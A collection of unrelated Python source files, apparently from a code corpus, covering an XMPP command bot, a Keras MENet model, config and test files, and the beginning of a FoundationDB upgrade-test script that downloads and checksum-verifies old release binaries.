self.add_event_handler("session_start", self.start)
self.add_event_handler("message", self.message)
def start(self, event):
"""
Process the session_start event.
Typical actions for the session_start event are
requesting the roster and broadcasting an initial
presence stanza.
Arguments:
event -- An empty dictionary. The session_start
event does not provide any additional
data.
"""
self.send_presence()
self.get_roster()
# We first create a session dictionary containing:
# 'next' -- the handler to execute on a successful response
# 'error' -- the handler to execute if an error occurs
# The session may also contain custom data.
session = {'greeting': self.greeting,
'next': self._command_start,
'error': self._command_error}
self['xep_0050'].start_command(jid=self.command_provider,
node='greeting',
session=session)
def message(self, msg):
"""
Process incoming message stanzas.
Arguments:
msg -- The received message stanza.
"""
logging.info(msg['body'])
def _command_start(self, iq, session):
"""
Process the initial command result.
Arguments:
iq -- The iq stanza containing the command result.
session -- A dictionary of data relevant to the command
session. Additional, custom data may be saved
here to persist across handler callbacks.
"""
# The greeting command provides a form with a single field:
# <x xmlns="jabber:x:data" type="form">
# <field var="greeting"
# type="text-single"
# label="Your greeting" />
# </x>
form = self['xep_0004'].makeForm(ftype='submit')
form.addField(var='greeting',
value=session['greeting'])
session['payload'] = form
# We don't need to process the next result.
session['next'] = None
# Other options include using:
# continue_command() -- Continue to the next step in the workflow
# cancel_command() -- Stop command execution.
self['xep_0050'].complete_command(session)
def _command_error(self, iq, session):
"""
Process an error that occurs during command execution.
Arguments:
iq -- The iq stanza containing the error.
session -- A dictionary of data relevant to the command
session. Additional, custom data may be saved
here to persist across handler callbacks.
"""
logging.error("COMMAND: %s %s" % (iq['error']['condition'],
iq['error']['text']))
# Terminate the command's execution and clear its session.
# The session will automatically be cleared if no error
# handler is provided.
self['xep_0050'].terminate_command(session)
self.disconnect()
if __name__ == '__main__':
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options.
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# JID and password options.
optp.add_option("-j", "--jid", dest="jid",
help="JID to use")
optp.add_option("-p", "--password", dest="password",
help="password to use")
optp.add_option("-o", "--other", dest="other",
help="JID providing commands")
optp.add_option("-g", "--greeting", dest="greeting",
help="Greeting")
opts, args = optp.parse_args()
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
if opts.jid is None:
opts.jid = raw_input("Username: ")
if opts.password is None:
opts.password = getpass.getpass("Password: ")
if opts.other is None:
opts.other = raw_input("JID Providing Commands: ")
if opts.greeting is None:
opts.greeting = raw_input("Greeting: ")
# Setup the CommandBot and register plugins. Note that while plugins may
# have interdependencies, the order in which you register them does
# not matter.
xmpp = CommandUserBot(opts.jid, opts.password, opts.other, opts.greeting)
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0004') # Data Forms
xmpp.register_plugin('xep_0050') # Adhoc Commands
# If you are working with an OpenFire server, you may need
# to adjust the SSL version used:
# xmpp.ssl_version = ssl.PROTOCOL_SSLv3
# If you want to verify the SSL certificates offered by a server:
# xmpp.ca_certs = "path/to/ca/cert"
# Connect to the XMPP server and start processing XMPP stanzas.
if xmpp.connect():
# If you do not have the dnspython library installed, you will need
# to manually specify the name of the server if it does not match
# the one in the JID. For example, to use Google Talk you would
# need to use:
#
# if xmpp.connect(('talk.google.com', 5222)):
# ...
xmpp.process(block=True)
print("Done")
else:
print("Unable to connect.")
|
py | 7df9f7aa355b20c6089c565ef15749937c7616a1 | from ._version import __version__ |
py | 7df9f7c05d850983dcf0d0ffefc01b48dfda018a | class Solution(object):
def isBipartite(self, graph) -> bool:
# Corner case
if len(graph) == 0:
return True
color = {}
for i in range(len(graph)):
if i not in color:
color[i] = 1
queue = list()
queue.append(i)
while len(queue) > 0:
curr = queue.pop(0)
for g in graph[curr]:
if g not in color:
color[g] = -color[curr]
queue.append(g)
else:
if color[g] == color[curr]:
return False
return True
|
py | 7df9f7fe8abf5111a949dd9aaa0fb894ed4aea9a | from dynaconf import settings
from dynaconf.loaders.vault_loader import list_envs
print(settings.FOO) # noqa
# >>> 'foo_is_default'
with settings.using_env("dev"):
assert settings.SECRET == "vault_works_in_dev", settings.SECRET
assert settings.FOO == "foo_is_default", settings.FOO
assert settings.SECRET == "vault_works_in_default"
available_envs = list_envs(settings, "dynaconf/")
assert set(available_envs) == set(["default", "dev", "prod"]), available_envs
all_secrets = []
for env in available_envs:
env_settings = settings.from_env(env)
assert env_settings.from_env(env).SECRET == "vault_works_in_{0}".format(
env
)
assert env_settings.FOO == "foo_is_default"
all_secrets.append(env_settings.SECRET)
print(available_envs)
print(all_secrets)
|
py | 7df9f8af15b9b7d7ed2d4374c0bce228689af733 | """
MENet, implemented in Keras.
Original paper: 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile Applications,'
https://arxiv.org/abs/1803.09127.
"""
__all__ = ['menet', 'menet108_8x1_g3', 'menet128_8x1_g4', 'menet160_8x1_g8', 'menet228_12x1_g3', 'menet256_12x1_g4',
'menet348_12x1_g3', 'menet352_12x1_g8', 'menet456_24x1_g3']
import os
from keras import layers as nn
from keras.models import Model
from .common import conv2d, conv1x1, conv3x3, depthwise_conv3x3, channel_shuffle_lambda, batchnorm, maxpool2d,\
avgpool2d, is_channels_first, get_channel_axis, flatten
def me_unit(x,
in_channels,
out_channels,
side_channels,
groups,
downsample,
ignore_group,
name="me_unit"):
"""
MENet unit.
Parameters:
----------
x : keras.backend tensor/variable/symbol
Input tensor/variable/symbol.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
side_channels : int
Number of side channels.
groups : int
Number of groups in convolution layers.
downsample : bool
Whether do downsample.
ignore_group : bool
Whether ignore group value in the first convolution layer.
name : str, default 'me_unit'
Unit name.
Returns
-------
keras.backend tensor/variable/symbol
Resulted tensor/variable/symbol.
"""
mid_channels = out_channels // 4
if downsample:
out_channels -= in_channels
identity = x
# pointwise group convolution 1
x = conv1x1(
x=x,
in_channels=in_channels,
out_channels=mid_channels,
groups=(1 if ignore_group else groups),
name=name + "/compress_conv1")
x = batchnorm(
x=x,
name=name + "/compress_bn1")
x = nn.Activation("relu", name=name + "/compress_activ")(x)
x = channel_shuffle_lambda(
channels=mid_channels,
groups=groups,
name=name + "/c_shuffle")(x)
# merging
y = conv1x1(
x=x,
in_channels=mid_channels,
out_channels=side_channels,
name=name + "/s_merge_conv")
y = batchnorm(
x=y,
name=name + "/s_merge_bn")
y = nn.Activation("relu", name=name + "/s_merge_activ")(y)
# depthwise convolution (bottleneck)
x = depthwise_conv3x3(
x=x,
channels=mid_channels,
strides=(2 if downsample else 1),
name=name + "/dw_conv2")
x = batchnorm(
x=x,
name=name + "/dw_bn2")
# evolution
y = conv3x3(
x=y,
in_channels=side_channels,
out_channels=side_channels,
strides=(2 if downsample else 1),
name=name + "/s_conv")
y = batchnorm(
x=y,
name=name + "/s_conv_bn")
y = nn.Activation("relu", name=name + "/s_conv_activ")(y)
y = conv1x1(
x=y,
in_channels=side_channels,
out_channels=mid_channels,
name=name + "/s_evolve_conv")
y = batchnorm(
x=y,
name=name + "/s_evolve_bn")
y = nn.Activation('sigmoid', name=name + "/s_evolve_activ")(y)
x = nn.multiply([x, y], name=name + "/mul")
# pointwise group convolution 2
x = conv1x1(
x=x,
in_channels=mid_channels,
out_channels=out_channels,
groups=groups,
name=name + "/expand_conv3")
x = batchnorm(
x=x,
name=name + "/expand_bn3")
if downsample:
identity = avgpool2d(
x=identity,
pool_size=3,
strides=2,
padding=1,
name=name + "/avgpool")
x = nn.concatenate([x, identity], axis=get_channel_axis(), name=name + "/concat")
else:
x = nn.add([x, identity], name=name + "/add")
x = nn.Activation("relu", name=name + "/final_activ")(x)
return x
def me_init_block(x,
in_channels,
out_channels,
name="me_init_block"):
"""
MENet specific initial block.
Parameters:
----------
x : keras.backend tensor/variable/symbol
Input tensor/variable/symbol.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
name : str, default 'me_init_block'
Block name.
Returns
-------
keras.backend tensor/variable/symbol
Resulted tensor/variable/symbol.
"""
x = conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=3,
strides=2,
padding=1,
use_bias=False,
name=name + "/conv")
x = batchnorm(
x=x,
name=name + "/bn")
x = nn.Activation("relu", name=name + "/activ")(x)
x = maxpool2d(
x=x,
pool_size=3,
strides=2,
padding=1,
name=name + "/pool")
return x
def menet(channels,
init_block_channels,
side_channels,
groups,
in_channels=3,
in_size=(224, 224),
classes=1000):
"""
ShuffleNet model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
channels : list of list of int
Number of output channels for each unit.
init_block_channels : int
Number of output channels for the initial unit.
side_channels : int
Number of side channels in a ME-unit.
groups : int
Number of groups in convolution layers.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""
input_shape = (in_channels, 224, 224) if is_channels_first() else (224, 224, in_channels)
input = nn.Input(shape=input_shape)
x = me_init_block(
x=input,
in_channels=in_channels,
out_channels=init_block_channels,
name="features/init_block")
in_channels = init_block_channels
for i, channels_per_stage in enumerate(channels):
for j, out_channels in enumerate(channels_per_stage):
downsample = (j == 0)
ignore_group = (i == 0) and (j == 0)
x = me_unit(
x=x,
in_channels=in_channels,
out_channels=out_channels,
side_channels=side_channels,
groups=groups,
downsample=downsample,
ignore_group=ignore_group,
name="features/stage{}/unit{}".format(i + 1, j + 1))
in_channels = out_channels
x = nn.AvgPool2D(
pool_size=7,
strides=1,
name="features/final_pool")(x)
x = flatten(x)
x = nn.Dense(
units=classes,
input_dim=in_channels,
name="output")(x)
model = Model(inputs=input, outputs=x)
model.in_size = in_size
model.classes = classes
return model
def get_menet(first_stage_channels,
side_channels,
groups,
model_name=None,
pretrained=False,
root=os.path.join('~', '.keras', 'models'),
**kwargs):
"""
Create MENet model with specific parameters.
Parameters:
----------
first_stage_channels : int
Number of output channels at the first stage.
side_channels : int
Number of side channels in a ME-unit.
groups : int
Number of groups in convolution layers.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
layers = [4, 8, 4]
if first_stage_channels == 108:
init_block_channels = 12
channels_per_layers = [108, 216, 432]
elif first_stage_channels == 128:
init_block_channels = 12
channels_per_layers = [128, 256, 512]
elif first_stage_channels == 160:
init_block_channels = 16
channels_per_layers = [160, 320, 640]
elif first_stage_channels == 228:
init_block_channels = 24
channels_per_layers = [228, 456, 912]
elif first_stage_channels == 256:
init_block_channels = 24
channels_per_layers = [256, 512, 1024]
elif first_stage_channels == 348:
init_block_channels = 24
channels_per_layers = [348, 696, 1392]
elif first_stage_channels == 352:
init_block_channels = 24
channels_per_layers = [352, 704, 1408]
elif first_stage_channels == 456:
init_block_channels = 48
channels_per_layers = [456, 912, 1824]
else:
raise ValueError("The {} of `first_stage_channels` is not supported".format(first_stage_channels))
channels = [[ci] * li for (ci, li) in zip(channels_per_layers, layers)]
net = menet(
channels=channels,
init_block_channels=init_block_channels,
side_channels=side_channels,
groups=groups,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import download_model
download_model(
net=net,
model_name=model_name,
local_model_store_dir_path=root)
return net
def menet108_8x1_g3(**kwargs):
"""
108-MENet-8x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=108, side_channels=8, groups=3, model_name="menet108_8x1_g3", **kwargs)
def menet128_8x1_g4(**kwargs):
"""
128-MENet-8x1 (g=4) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=128, side_channels=8, groups=4, model_name="menet128_8x1_g4", **kwargs)
def menet160_8x1_g8(**kwargs):
"""
160-MENet-8x1 (g=8) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=160, side_channels=8, groups=8, model_name="menet160_8x1_g8", **kwargs)
def menet228_12x1_g3(**kwargs):
"""
228-MENet-12x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=228, side_channels=12, groups=3, model_name="menet228_12x1_g3", **kwargs)
def menet256_12x1_g4(**kwargs):
"""
256-MENet-12x1 (g=4) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=256, side_channels=12, groups=4, model_name="menet256_12x1_g4", **kwargs)
def menet348_12x1_g3(**kwargs):
"""
348-MENet-12x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=348, side_channels=12, groups=3, model_name="menet348_12x1_g3", **kwargs)
def menet352_12x1_g8(**kwargs):
"""
352-MENet-12x1 (g=8) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=352, side_channels=12, groups=8, model_name="menet352_12x1_g8", **kwargs)
def menet456_24x1_g3(**kwargs):
"""
456-MENet-24x1 (g=3) model from 'Merging and Evolution: Improving Convolutional Neural Networks for Mobile
Applications,' https://arxiv.org/abs/1803.09127.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.keras/models'
Location for keeping the model parameters.
"""
return get_menet(first_stage_channels=456, side_channels=24, groups=3, model_name="menet456_24x1_g3", **kwargs)
def _test():
import numpy as np
import keras
pretrained = False
models = [
menet108_8x1_g3,
menet128_8x1_g4,
menet160_8x1_g8,
menet228_12x1_g3,
menet256_12x1_g4,
menet348_12x1_g3,
menet352_12x1_g8,
menet456_24x1_g3,
]
for model in models:
net = model(pretrained=pretrained)
# net.summary()
weight_count = keras.utils.layer_utils.count_params(net.trainable_weights)
print("m={}, {}".format(model.__name__, weight_count))
assert (model != menet108_8x1_g3 or weight_count == 654516)
assert (model != menet128_8x1_g4 or weight_count == 750796)
assert (model != menet160_8x1_g8 or weight_count == 850120)
assert (model != menet228_12x1_g3 or weight_count == 1806568)
assert (model != menet256_12x1_g4 or weight_count == 1888240)
assert (model != menet348_12x1_g3 or weight_count == 3368128)
assert (model != menet352_12x1_g8 or weight_count == 2272872)
assert (model != menet456_24x1_g3 or weight_count == 5304784)
if is_channels_first():
x = np.zeros((1, 3, 224, 224), np.float32)
else:
x = np.zeros((1, 224, 224, 3), np.float32)
y = net.predict(x)
assert (y.shape == (1, 1000))
if __name__ == "__main__":
_test()
|
py | 7df9f95b0db10b0b7bf3297fe0cd9f9bde67ce3f | import sys, os
from os.path import join
def serializer_paths(project):
return [
{
'template_path': join(os.path.abspath(sys.argv[0][:-12]), 'assets', 'templates', 'serializer', 'user_serializer'),
'filename': 'user_serializer.py',
'output_path': join(project.app_path, 'serializers')
},
{
'template_path': join(os.path.abspath(sys.argv[0][:-12]), 'assets', 'templates', 'serializer', '__init__'),
'filename': '__init__.py',
'output_path': join(project.app_path, 'serializers')
},
] |
py | 7df9f9971878d82af25c79b486141c856292ac66 | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'customers_api.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
py | 7df9f9c0a64f9d987029348d1965704c59ee1dfa | import pickle
from dagster_dbt import DbtCliOutput
from ..test_types import DBT_RESULT_DICT
class TestDbtCliOutput:
def test_init(self):
dco = DbtCliOutput(
command="dbt run",
return_code=0,
raw_output="The raw output (stdout).",
result=DBT_RESULT_DICT,
logs=[],
)
assert len(dco.result["results"]) == len(DBT_RESULT_DICT["results"])
def test_pickle_roundtrip(self): # pylint: disable=unused-argument
dco = DbtCliOutput(
command="dbt run",
return_code=0,
raw_output="The raw output (stdout).",
result=DBT_RESULT_DICT,
logs=[{"some": {"nested": {"logs"}}}, {"other": "log"}],
)
assert vars(pickle.loads(pickle.dumps(dco))) == vars(dco)
|
py | 7df9fa00a95fbd32bce946fcc979c824bf312bab | #!/usr/bin/env python
# Copyright 2018 Division of Medical Image Computing, German Cancer Research Center (DKFZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Default Configurations script. Avoids changing configs of all experiments if general settings are to be changed."""
import os
class DefaultConfigs:
def __init__(self, model, server_env=None, dim=2):
self.server_env = server_env
#########################
# I/O #
#########################
self.model = model
self.dim = dim
# int [0 < dataset_size]. select n patients from dataset for prototyping.
self.select_prototype_subset = None
# some default paths.
self.backbone_path = 'models/backbone.py'
self.source_dir = os.path.dirname(os.path.realpath(__file__)) #current dir.
self.input_df_name = 'info_df.pickle'
self.model_path = 'models/{}.py'.format(self.model)
if server_env:
self.source_dir = '/home/jaegerp/code/mamma_code/medicaldetectiontoolkit'
#########################
# Data Loader #
#########################
#random seed for fold_generator and batch_generator.
self.seed = 0
#number of threads for multithreaded batch generation.
self.n_workers = 2
# if True, segmentation losses learn all categories, else only foreground vs. background.
self.class_specific_seg_flag = False
#########################
# Architecture #
#########################
self.weight_decay = 0.0
# nonlinearity to be applied after convs with nonlinearity. one of 'relu' or 'leaky_relu'
self.relu = 'relu'
# if True initializes weights as specified in model script. else use default Pytorch init.
self.custom_init = False
# if True adds high-res decoder levels to feature pyramid: P1 + P0. (e.g. set to true in retina_unet configs)
self.operate_stride1 = False
#########################
# Schedule #
#########################
# number of folds in cross validation.
self.n_cv_splits = 5
# number of probabilistic samples in validation.
self.n_probabilistic_samples = None
#########################
# Testing / Plotting #
#########################
# perform mirroring at test time. (only XY. Z not done to not blow up predictions times).
self.test_aug = True
# if True, test data lies in a separate folder and is not part of the cross validation.
self.hold_out_test_set = False
# if hold_out_test_set provided, ensemble predictions over models of all trained cv-folds.
self.ensemble_folds = False
# color specifications for all box_types in prediction_plot.
self.box_color_palette = {'det': 'b', 'gt': 'r', 'neg_class': 'purple',
'prop': 'w', 'pos_class': 'g', 'pos_anchor': 'c', 'neg_anchor': 'c'}
# scan over confidence score in evaluation to optimize it on the validation set.
self.scan_det_thresh = False
# plots roc-curves / prc-curves in evaluation.
self.plot_stat_curves = False
# evaluates average precision per image and averages over images. instead computing one ap over data set.
self.per_patient_ap = False
# threshold for clustering 2D box predictions to 3D Cubes. Overlap is computed in XY.
self.merge_3D_iou = 0.1
# monitor any value from training.
self.n_monitoring_figures = 1
# dict to assign specific plot_values to monitor_figures > 0. {1: ['class_loss'], 2: ['kl_loss', 'kl_sigmas']}
self.assign_values_to_extra_figure = {}
# save predictions to csv file in experiment dir.
self.save_preds_to_csv = True
# select a maximum number of patient cases to test. number or "all" for all
self.max_test_patients = "all"
#########################
# MRCNN #
#########################
# if True, mask loss is not applied. used for data sets, where no pixel-wise annotations are provided.
self.frcnn_mode = False
# if True, unmolds masks in Mask R-CNN to full-res for plotting/monitoring.
self.return_masks_in_val = False
self.return_masks_in_test = False # needed if doing instance segmentation. evaluation not yet implemented.
# add P6 to Feature Pyramid Network.
self.sixth_pooling = False
# for probabilistic detection
self.n_latent_dims = 0
|
py | 7df9fa402263361b5e690dc6d900fd16b67aa4c6 | #!/usr/bin/env python
# Copyright 2018, Kay Hayen, mailto:[email protected]
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Launcher for doc/code sync release tool.
"""
import os
import sys
# Unchanged, running from checkout, use the parent directory, the nuitka
# package ought be there.
sys.path.insert(
0,
os.path.normpath(
os.path.join(
os.path.dirname(__file__),
"..",
)
)
)
from nuitka.tools.release.sync_doc.__main__ import main # isort:skip
main()
|
py | 7df9fba717fe4e2fa76c572bdfcbea4b4833f080 | values = [ random.normalvariate(1, 0.5) for i in range(1000)]
quick_check(values)
(0.990099111944864, 0.5029847005836282)
|
py | 7df9fdacc389093f92f7c6600219d4dc77fa72fd | #!/usr/bin/env python3
from argparse import ArgumentParser, RawDescriptionHelpFormatter
import glob
import os
from pathlib import Path
import platform
import random
import shutil
import stat
import subprocess
import sys
from threading import Thread, Event
import traceback
import time
from urllib import request
import hashlib
from local_cluster import LocalCluster, random_secret_string
SUPPORTED_PLATFORMS = ["x86_64"]
SUPPORTED_VERSIONS = [
"7.2.0",
"7.1.3",
"7.1.2",
"7.1.1",
"7.1.0",
"7.0.0",
"6.3.24",
"6.3.23",
"6.3.22",
"6.3.18",
"6.3.17",
"6.3.16",
"6.3.15",
"6.3.13",
"6.3.12",
"6.3.9",
"6.2.30",
"6.2.29",
"6.2.28",
"6.2.27",
"6.2.26",
"6.2.25",
"6.2.24",
"6.2.23",
"6.2.22",
"6.2.21",
"6.2.20",
"6.2.19",
"6.2.18",
"6.2.17",
"6.2.16",
"6.2.15",
"6.2.10",
"6.1.13",
"6.1.12",
"6.1.11",
"6.1.10",
"6.0.18",
"6.0.17",
"6.0.16",
"6.0.15",
"6.0.14",
"5.2.8",
"5.2.7",
"5.1.7",
"5.1.6",
]
CLUSTER_ACTIONS = ["wiggle"]
FDB_DOWNLOAD_ROOT = "https://github.com/apple/foundationdb/releases/download/"
LOCAL_OLD_BINARY_REPO = "/opt/foundationdb/old/"
CURRENT_VERSION = "7.2.0"
HEALTH_CHECK_TIMEOUT_SEC = 5
PROGRESS_CHECK_TIMEOUT_SEC = 30
TESTER_STATS_INTERVAL_SEC = 5
TRANSACTION_RETRY_LIMIT = 100
MAX_DOWNLOAD_ATTEMPTS = 5
RUN_WITH_GDB = False
def make_executable_path(path):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def remove_file_no_fail(filename):
try:
os.remove(filename)
except OSError:
pass
def version_from_str(ver_str):
ver = [int(s) for s in ver_str.split(".")]
assert len(ver) == 3, "Invalid version string {}".format(ver_str)
return ver
def api_version_from_str(ver_str):
ver_tuple = version_from_str(ver_str)
return ver_tuple[0] * 100 + ver_tuple[1] * 10
def version_before(ver_str1, ver_str2):
return version_from_str(ver_str1) < version_from_str(ver_str2)
def random_sleep(min_sec, max_sec):
time_sec = random.uniform(min_sec, max_sec)
print("Sleeping for {0:.3f}s".format(time_sec))
time.sleep(time_sec)
def compute_sha256(filename):
hash_function = hashlib.sha256()
with open(filename, "rb") as f:
while True:
data = f.read(128 * 1024)
if not data:
break
hash_function.update(data)
return hash_function.hexdigest()
def read_to_str(filename):
with open(filename, "r") as f:
return f.read()
class UpgradeTest:
def __init__(
self,
args
):
self.build_dir = Path(args.build_dir).resolve()
assert self.build_dir.exists(), "{} does not exist".format(args.build_dir)
assert self.build_dir.is_dir(), "{} is not a directory".format(args.build_dir)
self.upgrade_path = args.upgrade_path
self.used_versions = set(self.upgrade_path).difference(set(CLUSTER_ACTIONS))
for version in self.used_versions:
assert version in SUPPORTED_VERSIONS, "Unsupported version or cluster action {}".format(version)
self.platform = platform.machine()
assert self.platform in SUPPORTED_PLATFORMS, "Unsupported platform {}".format(
self.platform
)
self.tmp_dir = self.build_dir.joinpath("tmp", random_secret_string(16))
self.tmp_dir.mkdir(parents=True)
self.download_dir = self.build_dir.joinpath("tmp", "old_binaries")
self.local_binary_repo = Path(LOCAL_OLD_BINARY_REPO)
if not self.local_binary_repo.exists():
self.local_binary_repo = None
self.download_old_binaries()
self.create_external_lib_dir()
init_version = self.upgrade_path[0]
self.cluster = LocalCluster(
self.tmp_dir,
self.binary_path(init_version, "fdbserver"),
self.binary_path(init_version, "fdbmonitor"),
self.binary_path(init_version, "fdbcli"),
args.process_number,
create_config=False,
redundancy=args.redundancy
)
self.cluster.create_cluster_file()
self.configure_version(init_version)
self.log = self.cluster.log
self.etc = self.cluster.etc
self.data = self.cluster.data
self.input_pipe_path = self.tmp_dir.joinpath(
"input.{}".format(random_secret_string(8))
)
self.output_pipe_path = self.tmp_dir.joinpath(
"output.{}".format(random_secret_string(8))
)
os.mkfifo(self.input_pipe_path)
os.mkfifo(self.output_pipe_path)
self.progress_event = Event()
self.api_version = None
self.tester_retcode = None
self.tester_proc = None
self.output_pipe = None
self.tester_bin = None
self.ctrl_pipe = None
# Check if the binaries for the given version are available in the local old binaries repository
def version_in_local_repo(self, version):
return (self.local_binary_repo is not None) and (self.local_binary_repo.joinpath(version).exists())
def binary_path(self, version, bin_name):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("bin", bin_name)
elif self.version_in_local_repo(version):
return self.local_binary_repo.joinpath(version, "bin", "{}-{}".format(bin_name, version))
else:
return self.download_dir.joinpath(version, bin_name)
def lib_dir(self, version):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("lib")
else:
return self.download_dir.joinpath(version)
# Download an old binary of a given version from a remote repository
def download_old_binary(
self, version, target_bin_name, remote_bin_name, make_executable
):
local_file = self.download_dir.joinpath(version, target_bin_name)
if local_file.exists():
return
# Download to a temporary file and then replace the target file atomically
# to avoid consistency errors in case of multiple tests are downloading the
# same file in parallel
local_file_tmp = Path("{}.{}".format(str(local_file), random_secret_string(8)))
self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True)
remote_file = "{}{}/{}".format(FDB_DOWNLOAD_ROOT, version, remote_bin_name)
remote_sha256 = "{}.sha256".format(remote_file)
local_sha256 = Path("{}.sha256".format(local_file_tmp))
for attempt_cnt in range(MAX_DOWNLOAD_ATTEMPTS + 1):
if attempt_cnt == MAX_DOWNLOAD_ATTEMPTS:
assert False, "Failed to download {} after {} attempts".format(
local_file_tmp, MAX_DOWNLOAD_ATTEMPTS
)
try:
print("Downloading '{}' to '{}'...".format(remote_file, local_file_tmp))
request.urlretrieve(remote_file, local_file_tmp)
print("Downloading '{}' to '{}'...".format(remote_sha256, local_sha256))
request.urlretrieve(remote_sha256, local_sha256)
print("Download complete")
except Exception as e:
print("Retrying on error:", e)
continue
assert local_file_tmp.exists(), "{} does not exist".format(local_file_tmp)
assert local_sha256.exists(), "{} does not exist".format(local_sha256)
expected_checksum = read_to_str(local_sha256)
actual_checkum = compute_sha256(local_file_tmp)
if expected_checksum == actual_checkum:
print("Checksum OK")
break
print(
"Checksum mismatch. Expected: {} Actual: {}".format(
expected_checksum, actual_checkum
)
)
os.rename(local_file_tmp, local_file)
os.remove(local_sha256)
if make_executable:
make_executable_path(local_file)
# Copy a client library file from the local old binaries repository
# The file needs to be renamed to libfdb_c.so, because it is loaded with this name by fdbcli
def copy_clientlib_from_local_repo(self, version):
dest_lib_file = self.download_dir.joinpath(version, "libfdb_c.so")
if dest_lib_file.exists():
return
# Avoid race conditions in case of parallel test execution by first copying to a temporary file
# and then renaming it atomically
dest_file_tmp = Path("{}.{}".format(str(dest_lib_file), random_secret_string(8)))
src_lib_file = self.local_binary_repo.joinpath(version, "lib", "libfdb_c-{}.so".format(version))
assert src_lib_file.exists(), "Missing file {} in the local old binaries repository".format(src_lib_file)
self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True)
shutil.copyfile(src_lib_file, dest_file_tmp)
os.rename(dest_file_tmp, dest_lib_file)
assert dest_lib_file.exists(), "{} does not exist".format(dest_lib_file)
# Download all old binaries required for testing the specified upgrade path
def download_old_binaries(self):
for version in self.used_versions:
if version == CURRENT_VERSION:
continue
if self.version_in_local_repo(version):
self.copy_clientlib_from_local_repo(version)
continue
self.download_old_binary(
version, "fdbserver", "fdbserver.{}".format(self.platform), True
)
self.download_old_binary(
version, "fdbmonitor", "fdbmonitor.{}".format(self.platform), True
)
self.download_old_binary(
